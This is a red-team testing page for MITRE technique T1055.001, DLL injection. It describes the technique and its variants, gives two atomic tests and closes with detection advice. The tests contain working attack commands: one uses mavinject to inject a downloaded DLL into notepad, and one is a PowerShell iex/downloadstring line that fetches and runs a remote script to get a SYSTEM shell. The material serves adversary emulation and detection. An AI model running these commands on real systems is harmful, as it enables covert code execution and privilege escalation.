T1055.001 - Dynamic-link Library Injection

T1055.001 - Dynamic-link Library Injection#

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module’s AddressOfEntryPoint before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

Atomic Tests#

Atomic Test #1 - Process Injection via mavinject.exe#

Windows 10 Utility To Inject DLLS.

Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad’s icon in taskbar.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with `powershell`!#

Description: Utility to inject must exist on disk at specified location (#{dll_payload})#

Check Prereq Commands:#

if (Test-Path "PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll") {exit 0} else {exit 1}

Get Prereq Commands:#

New-Item -Type Directory (split-path "PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll"

Invoke-AtomicTest T1055.001 -TestNumbers 1 -GetPreReqs

Attack Commands: Run with `powershell`#

$mypid = (Start-Process notepad -PassThru).id
mavinject $mypid /INJECTRUNNING "PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll"
Stop-Process -processname notepad

Invoke-AtomicTest T1055.001 -TestNumbers 1

Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load techniqueGet SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwnSupported Platforms: windows#### Attack Commands: Run with `powershell`#

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')```

Invoke-AtomicTest T1055.001 -TestNumbers 2

Detection#

Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.

Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.